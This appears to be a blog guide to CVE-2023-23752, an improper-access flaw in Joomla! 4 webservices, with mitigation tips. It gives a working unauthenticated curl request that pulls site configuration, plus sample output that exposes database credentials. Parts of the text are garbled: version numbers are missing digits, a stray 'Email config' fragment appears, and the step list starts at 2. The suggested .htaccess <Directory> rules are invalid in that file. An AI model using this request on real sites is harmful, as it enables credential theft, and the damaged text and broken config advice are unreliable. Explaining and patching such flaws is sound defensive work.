CVE-2023-23752 - Exploiting Improper Webservice Access in Joomla! 4.x (Exclusive Guide)

In early 2023, researchers uncovered a critical vulnerability in the widely-used Joomla! CMS. Tracked as CVE-2023-23752, this flaw affects Joomla! versions 4.. through 4.2.7. It centers around improper access checks, allowing unauthorized users to access sensitive webservice endpoints meant only for privileged users.

This post breaks down how the vulnerability works, demonstrates a simple exploit, and shares original references for further reading—all in easy language for developers and admins.

What Is CVE-2023-23752?

Joomla! is an open-source content management system (CMS), powering millions of websites worldwide. Webservices, introduced in Joomla! 4, let admins and plugins access the backend through API endpoints.

However, in affected versions (4.. to 4.2.7), access controls for these endpoints were mishandled. This mistake allowed anyone (even unauthenticated users) to fetch sensitive configuration info just by calling certain API URLs.

Joomla! 4.. through 4.2.7

Fixed in:  
Joomla! 4.2.8 and later

How the Exploit Works

The crux lies in an authorization bypass. Joomla! exposes its webservices under /api/index.php. Some endpoints should require authenticated access; due to improper checks, that wasn't enforced for certain requests.

No login is needed—an attacker only needs a browser or a tool like curl.

Vulnerable Endpoint Example

A classic endpoint to target is /api/index.php/v1/config/application?public=true. Accessing this gives up config secrets.

Exploit Walkthrough

Let's walk through a simple proof-of-concept (PoC) exploit.

We'll use curl, a common network tool.

curl -k https://target-site.com/api/index.php/v1/config/application?public=true

If the site is vulnerable, you'll see a JSON dump like

{
  "data": {
    "offline": false,
    "sitename": "My Joomla Site",
    "dbtype": "mysqli",
    "host": "localhost",
    "user": "joomla_db_user",
    "password": "supersecretpassword",
    "db": "joomla_db",
    "mailfrom": "admin@example.com",
    "fromname": "Admin"
  }
}

Email config

Original Reference:  
- HackerOne Report  
- Joomla! Official Release Announcement  
- NVD Details

Update Joomla! immediately to version 4.2.8 or higher.

2. Check your access logs for suspicious requests to /api/index.php.
3. Restrict access to your site's /api/ endpoints via .htaccess or your reverse proxy.

Add to your .htaccess file

<Directory "/path/to/your/site/api">
    Require all denied
</Directory>

Or only allow specific IPs

<Directory "/path/to/your/site/api">
    Require ip 1.2.3.4
</Directory>

Final Thoughts

CVE-2023-23752 is a serious but easy-to-fix bug for Joomla! users. With a simple HTTP request, an attacker could uncover details that facilitate far more dangerous attacks. Every Joomla! site owner should patch *now*.

Read more

- Joomla! Security Center
- HackerOne Original Report
- NIST NVD CVE-2023-23752


If you run Joomla!—update today.  
Questions or need help? Drop a comment below! Stay safe out there.

Timeline

Published on: 02/16/2023 17:15:00 UTC
Last modified on: 02/24/2023 16:17:00 UTC